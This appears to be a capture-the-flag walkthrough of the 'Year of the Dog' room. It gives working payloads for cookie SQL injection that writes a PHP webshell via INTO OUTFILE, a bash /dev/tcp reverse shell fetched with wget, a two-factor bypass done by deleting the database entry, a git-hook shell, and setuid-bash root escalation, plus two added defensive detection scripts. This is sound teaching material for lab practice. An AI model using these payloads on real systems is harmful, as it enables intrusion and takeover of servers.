In this post, we will work through the Year of the Dog room, which is exposed to SQL injection and Remote Code Execution (RCE). The room is rated HARD, and I completed it after three whole days of struggle, with advice from my security friends.

Let’s Start!

As usual, we need to deploy the machine so we can play with it.

Once the deployed machine is running, we run an nmap scan such as nmap -sC -sV <IP Address> -PN to enumerate the server.

From the nmap output, we found that the following ports are open:

  • 22: OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
  • 80: Apache httpd 2.4.29 – Canis Queue

First, we open the website and look at its interface in case anything there can be used for exploitation.

However, we should bear in mind that the SSH port is also open.

Oh no! There is nothing on the website that we can work with. Let's run dirb to enumerate any directories on the website.

Sadly, we don't find any directory that we can exploit.

I inspected the website with the web inspector and tried the usual attacks. When I added a quote character at the end of the cookie value, I noticed that the website returned an error.

I did my research on SQL injection and found that there are three types:

  1. Error-based SQL injection
  2. Blind SQL injection
  3. Union-based SQL injection (which we will be using in this challenge)

Basic Union SQL Injection

' UNION SELECT NULL,NULL,NULL--

However, we will focus on a more complicated union SQL injection; some of the payloads we can use are listed below:

'union select 1,unhex('3C3F7068702073797374656D28245F4745545B22636D64225D29203F3E') INTO OUTFILE '/var/www/html/shell1.php' from webapp.queue-- -
' INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED by 0x3c3C3F7068702073797374656D28245F4745545B22636D64225D29203F3E#

In my case, I will be using the second union SQL injection payload.

When you save the cookie and refresh, the website shows “You are number Error in the queue”. We don't have to worry about it; go to http://<IP Address>/shell.php and you will see the interface below:

Just in case the method above does not work for you, there is another way to reach the shell, using Burp Suite as follows:

The result can be seen in the screenshot below.

As you can see, we get the same output either way, so don't worry too much if the first method is not working.
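As a defender-side counterpart to the payloads above, here is an added Python example (not part of the original writeup) that scans URL-encoded cookie values for this injection family and decodes MySQL hex literals so the PHP smuggled inside the INTO OUTFILE payload becomes readable; the sample cookies are constructed, one of them from the payload shown above.

```python
import re
from urllib.parse import unquote

# Markers of the union / INTO OUTFILE injection family shown above.
SQLI_MARKERS = {
    "union select": r"\bunion\s+(?:all\s+)?select\b",
    "into outfile": r"\binto\s+(?:out|dump)file\b",
    "lines terminated by": r"\blines\s+terminated\s+by\b",
    "unhex call": r"\bunhex\s*\(",
}
# MySQL hex string literals in either form: 0x3C3F... or unhex('3C3F...').
HEX_LITERAL = re.compile(r"(?:0x|unhex\(\s*')([0-9a-fA-F]{2,})", re.IGNORECASE)


def decode_hex_literals(value: str) -> list[str]:
    """Decode every hex literal in value so smuggled PHP becomes readable."""
    decoded = []
    for match in HEX_LITERAL.finditer(value):
        hexstr = match.group(1)
        if len(hexstr) % 2:              # odd length: drop the dangling nibble
            hexstr = hexstr[:-1]
        decoded.append(bytes.fromhex(hexstr).decode("latin-1"))
    return decoded


def inspect_value(raw: str) -> list[str]:
    """Return findings for one URL-encoded cookie or query-string value."""
    value = unquote(raw)
    findings = [n for n, p in SQLI_MARKERS.items() if re.search(p, value, re.I)]
    if any("<?php" in t or "system(" in t for t in decode_hex_literals(value)):
        findings.append("hex-encoded PHP webshell")
    return findings


def scan_cookies(cookies: list[str]) -> dict[str, list[str]]:
    """Map each suspicious raw 'name=value' cookie to its findings."""
    report = {}
    for raw in cookies:
        findings = inspect_value(raw.partition("=")[2])
        if findings:
            report[raw] = findings
    return report


# Constructed samples: a benign value, the basic union probe, and the writeup's
# INTO OUTFILE payload, URL-encoded as a browser would send it.
SAMPLE_COOKIES = [
    "id=3f1e2a",
    "id=%27%20UNION%20SELECT%20NULL%2CNULL%2CNULL--",
    "id=%27%20INTO%20OUTFILE%20%27/var/www/html/shell.php%27%20LINES%20TERMINATED"
    "%20by%200x3c3C3F7068702073797374656D28245F4745545B22636D64225D29203F3E%23",
]
```

The file write only succeeds because the database account holds the FILE privilege and secure_file_priv does not restrict output paths; parameterized queries remove the injection itself, and tightening those two settings removes the write primitive even if an injection slips through.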

Let’s continue with the challenges!

Before we upload the shell, the player needs a basic understanding of how commands are passed, such as http://<IP Address>/shell.php?cmd=<any command>

I will use http://<IP Address>/shell.php?cmd=ls as an example for your reference.

To upload a reverse shell on the machine, the player has to run commands through the cmd parameter. As a starter, we create a file containing the following line:

bash -i >& /dev/tcp/<IP Address>/<PORT> 0>&1

To transfer the file to the website, start http.server in the folder containing the file you want to transfer, as shown below.

Once that is done, you can transfer the file to the website with the command

<IP Address>/shell.php?cmd=wget <IP Address>:<PORT>/<Filename that you transfer>

To verify that the file was uploaded successfully, run http://<IP Address>/shell.php?cmd=ls

The file has been uploaded to the machine successfully.

We get the shell connection back by running a command such as <IP Address>/shell.php?cmd=bash <filename>.sh

We know that we are www-data after running whoami in the machine's terminal.

It looks easy so far. So, let us peek at the users of this machine.

From the result we retrieved, I can conclude that dylan is the only user stored on the machine.

Oh wow! We have found user.txt; let's get the user flag.

Sadly, we cannot read the file: an error appears stating that permission is denied.

But wait! There's a file named work_analysis that might give a clue on how to access the user.txt file. There are a few commands we can use here:

  1. cat work_analysis | grep dylan
  2. grep -Ri dylan 2>/dev/null

Now we have the username and password for the user “dylan”. Let's try to SSH into the machine with dylan's username and password.

Finally, we have successfully logged in to the machine with dylan's credentials.

We retrieved the user flag successfully without any error.

We notice that port 3000 is open on localhost. So, let's exit the machine and open a new connection with port forwarding by running

ssh dylan@<IP Address> -L 3000:localhost:3000

Let's access the website in the browser to see if we connected successfully.

My bad! We need to access the website using the same URL as we configured it.

We key in the username and password as

  • username: dylan or dylan@yearofthedog.thm
  • password: <dylan's SSH password>

Once you key in the username and password, a page asks for a Two-Factor Authentication passcode, which we don't have at all.

However, we can bypass the Two-Factor Authentication by deleting the passcode from the database.

Let’s go!

We access the gitea directory by typing cd /gitea/gitea

Let's delete the two-factor entry from the database by running the following python script

Now that we have deleted the two_factor entry from the machine's database, we can access the dashboard without entering any two-factor code.

For the player to receive the shell connection back, we need to execute a command; the code can be found on pentestmonkey.net.

Once we get the code from the pentestmonkey website, let's add it to the git hooks and click Update Hook.

We need to start the listener before proceeding with the shell.

Next, we download the repository by running git clone http://localhost:3000/Dylan/Test-repo.git

* Reminder: better not to change the repo on the website; it might not work as planned.

Now we have downloaded the files; run the following commands to push a change to git

Once that is done, let's execute the git push origin master command

It's weird to get an error when executing the command above.

I just noticed that I had downloaded the repo onto my own machine. No wonder it doesn't work at all!

Let's run the same commands on the target machine.

We run the last command, git push origin master, and hope it works!

No error appears this time. Let's check the listener to see if we got the shell connection back.

Wuhuu! We got the connection back. When we access the /data directory, we notice that only three directories can be found there.

We need a bash binary to execute in order to root the machine. Let's upload the bash file into bash-5.0. In the SSH session, we locate the bash binary, which is normally stored at /bin/

We run an http.server session in the /bin/ directory so the other machine can fetch the bash binary.

On the victim's machine, we execute the command

wget <IP Address>:8000/bash -O /data

We can run ls to ensure the file was downloaded successfully.

In the SSH session, we verify that the bash file is there

Let’s run bash -p

Nothing happens because the file permissions have not been set correctly. For the file to run with elevated privileges, we go to the victim's terminal and run chmod 4755 bash as shown below:

We can verify the permission change by typing ls in the SSH session

From the screenshot above, we can confirm the file's permissions have changed.

Now we can execute bash -p again and hope it works!

We have logged in successfully with root privileges; let's go and get the root flag. Normally, the flag is located at /root/

We can ls to check if my assumption is correct

To read the root flag, we execute the command cat root.txt
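The privilege escalation above works because a setuid bash dropped into a shared volume keeps its bits on the other side of the mount. As an added defender-side example (not from the original writeup), the Python below audits a directory for setuid/setgid files and checks, from constructed /proc/self/mountinfo lines, whether a mount such as /data carries the nosuid option that would neutralise this; the demo function creates its own throwaway files.

```python
import os
import stat
import tempfile

def setuid_files(root: str) -> list[tuple[str, int, str]]:
    """Walk root and return (path, owner uid, octal mode) for every regular
    file with the setuid or setgid bit set, e.g. a dropped bash with mode 4755."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, st.st_uid, oct(stat.S_IMODE(st.st_mode))))
    return sorted(hits)

def mount_options(mountinfo: str, mountpoint: str) -> set[str]:
    """Return the option set for mountpoint from /proc/self/mountinfo text
    (field 5 is the mount point, field 6 the per-mount options)."""
    for line in mountinfo.splitlines():
        fields = line.split()
        if len(fields) > 5 and fields[4] == mountpoint:
            return set(fields[5].split(","))
    return set()

def is_nosuid(mountinfo: str, mountpoint: str) -> bool:
    return "nosuid" in mount_options(mountinfo, mountpoint)

# Constructed mountinfo lines: a bind-mounted /data without nosuid (the risky
# layout from the room) and a /tmp mounted nosuid for comparison.
SAMPLE_MOUNTINFO = """\
22 1 8:1 / / rw,relatime shared:1 - ext4 /dev/sda1 rw
71 22 8:1 /srv/shared /data rw,relatime shared:1 - ext4 /dev/sda1 rw
40 22 0:30 / /tmp rw,nosuid,nodev,noexec,relatime shared:20 - tmpfs tmpfs rw
"""

def demo_dropped_bash() -> list[tuple[str, str]]:
    """Create a throwaway dir with one 4755 'bash' and one plain file, then
    return (basename, mode) for whatever the audit flags."""
    with tempfile.TemporaryDirectory() as d:
        for name, mode in (("bash", 0o4755), ("notes.txt", 0o644)):
            path = os.path.join(d, name)
            open(path, "wb").close()
            os.chmod(path, mode)         # 4755 matches the writeup's chmod
        return [(os.path.basename(p), m) for p, _, m in setuid_files(d)]
```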

-THE END-

Happy Learning Guys!
